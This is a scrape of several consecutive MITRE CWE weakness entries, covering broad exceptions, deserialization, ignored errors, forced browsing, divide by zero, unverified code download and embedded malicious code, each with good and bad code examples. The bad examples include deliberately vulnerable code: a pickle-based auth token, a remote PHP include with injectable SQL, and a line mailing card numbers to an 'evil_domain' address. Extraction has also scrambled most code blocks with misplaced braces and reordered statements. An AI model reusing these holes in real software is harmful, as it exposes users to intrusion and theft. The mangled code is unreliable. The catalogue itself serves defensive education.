For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterCatching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.
Multiple catch blocks can get ugly and repetitive, but "condensing" catch blocks by catching a high-level class like Exception can obscure exceptions that deserve special treatment or that should not be caught at this point in the program. Catching an overly broad exception essentially defeats the purpose of a language's typed exceptions, and can become particularly dangerous if the program grows and begins to throw new types of exceptions. The new exception types will not receive any attention.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code excerpt handles three types of exceptions in an identical fashion. (good code)
Example Language: Java
try {
doExchange(); }catch (IOException e) { logger.error("doExchange failed", e); }catch (InvocationTargetException e) { logger.error("doExchange failed", e); catch (SQLException e) { logger.error("doExchange failed", e); At first blush, it may seem preferable to deal with these exceptions in a single catch block, as follows: (bad code)
Example Language: Java
try {
doExchange(); }catch (Exception e) { logger.error("doExchange failed", e); }However, if doExchange() is modified to throw a new type of exception that should be handled in some different kind of way, the broad catch block will prevent the compiler from pointing out the situation. Further, the new catch block will now also handle exceptions derived from RuntimeException such as ClassCastException, and NullPointerException, which is not the programmer's intent.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-397: Declaration of Throws for Generic Exception
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product throws or raises an overly broad exceptions that can hide important details and produce inappropriate responses to certain conditions.
Declaring a method to throw Exception or Throwable promotes generic error handling procedures that make it difficult for callers to perform proper error handling and error recovery. For example, Java's exception mechanism makes it easy for callers to anticipate what can go wrong and write code to handle each specific exceptional circumstance. Declaring that a method throws a generic form of exception defeats this system.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following method throws three types of exceptions. (good code)
Example Language: Java
public void doExchange() throws IOException, InvocationTargetException, SQLException {
... }While it might seem tidier to write (bad code)
Example Language: Java
public void doExchange() throws Exception {
... }doing so hampers the caller's ability to understand and handle the exceptions that occur. Further, if a later revision of doExchange() introduces a new type of exception that should be treated differently than previous exceptions, there is no easy way to enforce this requirement. Example 2 Early versions of C++ (C++98, C++03, C++11) included a feature known as Dynamic Exception Specification. This allowed functions to declare what type of exceptions it may throw. It is possible to declare a general class of exception to cover any derived exceptions that may be thrown. (bad code)
Example Language: C++
int myfunction() throw(std::exception) {
if (0) throw out_of_range(); }throw length_error(); In the example above, the code declares that myfunction() can throw an exception of type "std::exception" thus hiding details about the possible derived exceptions that could potentially be thrown.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Applicable Platform
For C++, this weakness only applies to C++98, C++03, and C++11. It relies on a feature known as Dynamic Exception Specification, which was part of early versions of C++ but was deprecated in C++11. It has been removed for C++17 and later.
CWE-1395: Dependency on Vulnerable Third-Party Component
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product has a dependency on a third-party component that contains one or more known vulnerabilities.
Many products are large enough or complex enough that part of their functionality uses libraries, modules, or other intellectual property developed by third parties who are not the product creator. For example, even an entire operating system might be from a third-party supplier in some hardware products. Whether open or closed source, these components may contain publicly known vulnerabilities that could be exploited by adversaries to compromise the product. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The "SweynTooth" vulnerabilities in Bluetooth Low Energy (BLE) software development kits (SDK) were found to affect multiple Bluetooth System-on-Chip (SoC) manufacturers. These SoCs were used by many products such as medical devices, Smart Home devices, wearables, and other IoT devices. [REF-1314] [REF-1315] Example 2 log4j, a Java-based logging framework, is used in a large number of products, with estimates in the range of 3 billion affected devices [REF-1317]. When the "log4shell" (CVE-2021-44228) vulnerability was initially announced, it was actively exploited for remote code execution, requiring urgent mitigation in many organizations. However, it was unclear how many products were affected, as Log4j would sometimes be part of a long sequence of transitive dependencies. [REF-1316] Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-502: Deserialization of Untrusted Data
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code snippet deserializes an object from a file and uses it as a UI button: (bad code)
Example Language: Java
try {
File file = new File("object.obj"); }ObjectInputStream in = new ObjectInputStream(new FileInputStream(file)); javax.swing.JButton button = (javax.swing.JButton) in.readObject(); in.close(); This code does not attempt to verify the source or contents of the file before deserializing it. An attacker may be able to replace the intended file with a file that contains arbitrary malicious code which will be executed when the button is pressed. To mitigate this, explicitly define final readObject() to prevent deserialization. An example of this is: (good code)
Example Language: Java
private final void readObject(ObjectInputStream in) throws java.io.IOException {
throw new java.io.IOException("Cannot be deserialized"); } Example 2 In Python, the Pickle library handles the serialization and deserialization processes. In this example derived from [REF-467], the code receives and parses data, and afterwards tries to authenticate a user based on validating a token. (bad code)
Example Language: Python
try {
class ExampleProtocol(protocol.Protocol):
def dataReceived(self, data): # Code that would be here would parse the incoming data # After receiving headers, call confirmAuth() to authenticate def confirmAuth(self, headers): try: token = cPickle.loads(base64.b64decode(headers['AuthToken'])) if not check_hmac(token['signature'], token['data'], getSecretKey()): raise AuthFail self.secure_data = token['data'] except: raise AuthFail Unfortunately, the code does not verify that the incoming data is legitimate. An attacker can construct a illegitimate, serialized object "AuthToken" that instantiates one of Python's subprocesses to execute arbitrary commands. For instance,the attacker could construct a pickle that leverages Python's subprocess module, which spawns new processes and includes a number of arguments for various uses. Since Pickle allows objects to define the process for how they should be unpickled, the attacker can direct the unpickle process to call Popen in the subprocess module and execute /bin/sh. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-390: Detection of Error Condition Without Action
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following example attempts to allocate memory for a character. After the call to malloc, an if statement is used to check whether the malloc function failed. (bad code)
Example Language: C
foo=malloc(sizeof(char)); //the next line checks to see if malloc failed
if (foo==NULL) { //We do nothing so we just ignore the error. }The conditional successfully detects a NULL return value from malloc indicating a failure, however it does not do anything to handle the problem. Unhandled errors may have unexpected results and may cause the program to crash or terminate. Instead, the if block should contain statements that either attempt to fix the problem or notify the user that an error has occurred and continue processing or perform some cleanup and gracefully terminate the program. The following example notifies the user that the malloc function did not allocate the required memory resources and returns an error code. (good code)
Example Language: C
foo=malloc(sizeof(char)); //the next line checks to see if malloc failed
if (foo==NULL) { printf("Malloc failed to allocate memory resources"); }return -1; Example 2 In the following C++ example the method readFile() will read the file whose name is provided in the input parameter and will return the contents of the file in char string. The method calls open() and read() may result in errors if the file does not exist or does not contain any data to read. These errors will be thrown when the is_open() method and good() method indicate errors opening or reading the file. However, these errors are not handled within the catch statement. Catch statements that do not perform any processing will have unexpected results. In this case an empty char string will be returned, and the file will not be properly closed. (bad code)
Example Language: C++
char* readfile (char *filename) {
try {
// open input file
ifstream infile; infile.open(filename); if (!infile.is_open()) { throw "Unable to open file " + filename; }// get length of file infile.seekg (0, ios::end); int length = infile.tellg(); infile.seekg (0, ios::beg); // allocate memory char *buffer = new char [length]; // read data from file infile.read (buffer,length); if (!infile.good()) { throw "Unable to read from file " + filename; }infile.close(); return buffer; catch (...) { /* bug: insert code to handle this later */ }The catch statement should contain statements that either attempt to fix the problem or notify the user that an error has occurred and continue processing or perform some cleanup and gracefully terminate the program. The following C++ example contains two catch statements. The first of these will catch a specific error thrown within the try block, and the second catch statement will catch all other errors from within the catch block. Both catch statements will notify the user that an error has occurred, close the file, and rethrow to the block that called the readFile() method for further handling or possible termination of the program. (good code)
Example Language: C++
char* readFile (char *filename) {
try {
// open input file
ifstream infile; infile.open(filename); if (!infile.is_open()) { throw "Unable to open file " + filename; }// get length of file infile.seekg (0, ios::end); int length = infile.tellg(); infile.seekg (0, ios::beg); // allocate memory char *buffer = new char [length]; // read data from file infile.read (buffer,length); if (!infile.good()) { throw "Unable to read from file " + filename; }infile.close(); return buffer; catch (char *str) { printf("Error: %s \n", str); }infile.close(); throw str; catch (...) { printf("Error occurred trying to read from file \n"); }infile.close(); throw; Example 3 In the following Java example the method readFile will read the file whose name is provided in the input parameter and will return the contents of the file in a String object. The constructor of the FileReader object and the read method call may throw exceptions and therefore must be within a try/catch block. While the catch statement in this example will catch thrown exceptions in order for the method to compile, no processing is performed to handle the thrown exceptions. Catch statements that do not perform any processing will have unexpected results. In this case, this will result in the return of a null String. (bad code)
Example Language: Java
public String readFile(String filename) {
String retString = null;
try { // initialize File and FileReader objects
File file = new File(filename); FileReader fr = new FileReader(file); // initialize character buffer long fLen = file.length(); char[] cBuf = new char[(int) fLen]; // read data from file int iRead = fr.read(cBuf, 0, (int) fLen); // close file fr.close(); retString = new String(cBuf); /* do nothing, but catch so it'll compile... */ }return retString; The catch statement should contain statements that either attempt to fix the problem, notify the user that an exception has been raised and continue processing, or perform some cleanup and gracefully terminate the program. The following Java example contains three catch statements. The first of these will catch the FileNotFoundException that may be thrown by the FileReader constructor called within the try/catch block. The second catch statement will catch the IOException that may be thrown by the read method called within the try/catch block. The third catch statement will catch all other exceptions thrown within the try block. For all catch statements the user is notified that the exception has been thrown and the exception is rethrown to the block that called the readFile() method for further processing or possible termination of the program. Note that with Java it is usually good practice to use the getMessage() method of the exception class to provide more information to the user about the exception raised. (good code)
Example Language: Java
public String readFile(String filename) throws FileNotFoundException, IOException, Exception {
String retString = null;
try { // initialize File and FileReader objects
File file = new File(filename); FileReader fr = new FileReader(file); // initialize character buffer long fLen = file.length(); char [] cBuf = new char[(int) fLen]; // read data from file int iRead = fr.read(cBuf, 0, (int) fLen); // close file fr.close(); retString = new String(cBuf); System.err.println ("Error: FileNotFoundException opening the input file: " + filename ); } catch (IOException ex) {System.err.println ("" + ex.getMessage() ); throw new FileNotFoundException(ex.getMessage()); System.err.println("Error: IOException reading the input file.\n" + ex.getMessage() ); } catch (Exception ex) {throw new IOException(ex); System.err.println("Error: Exception reading the input file.\n" + ex.getMessage() ); }throw new Exception(ex); return retString; Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-425: Direct Request ('Forced Browsing')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe web application does not adequately enforce appropriate authorization on all restricted URLs, scripts, or files.
Web applications susceptible to direct request attacks often make the false assumption that such resources can only be reached through a given navigation path and so only apply authorization at certain points in the path.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 If forced browsing is possible, an attacker may be able to directly access a sensitive page by entering a URL similar to the following. (attack code)
Example Language: JSP
http://somesite.com/someapplication/admin.jsp
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
Overlaps Modification of Assumed-Immutable Data (MAID), authorization errors, container errors; often primary to other weaknesses such as XSS and SQL injection.
Theoretical
"Forced browsing" is a step-based manipulation involving the omission of one or more steps, whose order is assumed to be immutable. The application does not verify that the first step was performed successfully before the second step. The consequence is typically "authentication bypass" or "path disclosure," although it can be primary to all kinds of weaknesses, especially in languages such as PHP, which allow external modification of assumed-immutable variables.
CWE-369: Divide By Zero
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
This weakness typically occurs when an unexpected value is provided to the product, or if an error occurs that is not properly detected. It frequently occurs in calculations involving physical dimensions such as size, length, width, and height.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "CISQ Quality Measures (2020)" (View-1305)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following Java example contains a function to compute an average but does not validate that the input value used as the denominator is not zero. This will create an exception for attempting to divide by zero. If this error is not handled by Java exception handling, unexpected results can occur. (bad code)
Example Language: Java
public int computeAverageResponseTime (int totalTime, int numRequests) {
return totalTime / numRequests; }By validating the input value used as the denominator the following code will ensure that a divide by zero error will not cause unexpected results. The following Java code example will validate the input value, output an error message, and throw an exception. (good code)
Example Language: Java
public int computeAverageResponseTime (int totalTime, int numRequests) throws ArithmeticException {
if (numRequests == 0) { }System.out.println("Division by zero attempted!"); }throw ArithmeticException; return totalTime / numRequests; Example 2 The following C/C++ example contains a function that divides two numeric values without verifying that the input value used as the denominator is not zero. This will create an error for attempting to divide by zero, if this error is not caught by the error handling capabilities of the language, unexpected results can occur. (bad code)
Example Language: C
double divide(double x, double y){
return x/y; }By validating the input value used as the denominator the following code will ensure that a divide by zero error will not cause unexpected results. If the method is called and a zero is passed as the second argument a DivideByZero error will be thrown and should be caught by the calling block with an output message indicating the error. (good code)
Example Language: C
const int DivideByZero = 10;
double divide(double x, double y){ if ( 0 == y ){ }throw DivideByZero; }return x/y; ... try{ divide(10, 0); }catch( int i ){ if(i==DivideByZero) { }cerr<<"Divide by zero error"; }
Example 3 The following C# example contains a function that divides two numeric values without verifying that the input value used as the denominator is not zero. This will create an error for attempting to divide by zero, if this error is not caught by the error handling capabilities of the language, unexpected results can occur. (bad code)
Example Language: C#
int Division(int x, int y){
return (x / y); }The method can be modified to raise, catch and handle the DivideByZeroException if the input value used as the denominator is zero. (good code)
Example Language: C#
int SafeDivision(int x, int y){
try{ }return (x / y); }catch (System.DivideByZeroException dbz){ System.Console.WriteLine("Division by zero attempted!"); }return 0;
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-494: Download of Code Without Integrity Check
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product downloads source code or an executable from a remote location and executes the code without sufficiently verifying the origin and integrity of the code.
An attacker can execute malicious code by compromising the host server, performing DNS spoofing, or modifying the code in transit.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This example loads an external class from a local subdirectory. (bad code)
Example Language: Java
URL[] classURLs= new URL[]{
new URL("file:subdir/") };URLClassLoader loader = new URLClassLoader(classURLs); Class loadedClass = Class.forName("loadMe", true, loader); This code does not ensure that the class loaded is the intended one, for example by verifying the class's checksum. An attacker may be able to modify the class file to execute malicious code. Example 2 This code includes an external script to get database credentials, then authenticates a user against the database, allowing access to the application. (bad code)
Example Language: PHP
//assume the password is already encrypted, avoiding CWE-312
function authenticate($username,$password){ include("http://external.example.com/dbInfo.php"); //dbInfo.php makes $dbhost, $dbuser, $dbpass, $dbname available mysql_connect($dbhost, $dbuser, $dbpass) or die ('Error connecting to mysql'); mysql_select_db($dbname); $query = 'Select * from users where username='.$username.' And password='.$password; $result = mysql_query($query); if(mysql_numrows($result) == 1){ mysql_close(); }return true; else{ mysql_close(); }return false; } This code does not verify that the external domain accessed is the intended one. An attacker may somehow cause the external domain name to resolve to an attack server, which would provide the information for a false database. The attacker may then steal the usernames and encrypted passwords from real user login attempts, or simply allow themself to access the application without a real user account. This example is also vulnerable to an Adversary-in-the-Middle AITM (CWE-300) attack. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Research Gap
This is critical for mobile code, but it is likely to become more and more common as developers continue to adopt automated, network-based product distributions and upgrades. Software-as-a-Service (SaaS) might introduce additional subtleties. Common exploitation scenarios may include ad server compromises and bad upgrades.
CWE-506: Embedded Malicious Code
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of a product or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address. (bad code)
Example Language: Java
boolean authorizeCard(String ccn) {
// Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
It is suspected that malicious
code can often be characterized using other "regular"
weaknesses related to insecure behavior. However, this has
not been closely investigated.
Terminology
The term "Trojan horse" was introduced by Dan Edwards and recorded by James Anderson [18] to characterize a particular computer security threat; it has been redefined many times [4,18-20].
CWE-258: Empty Password in Configuration File
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
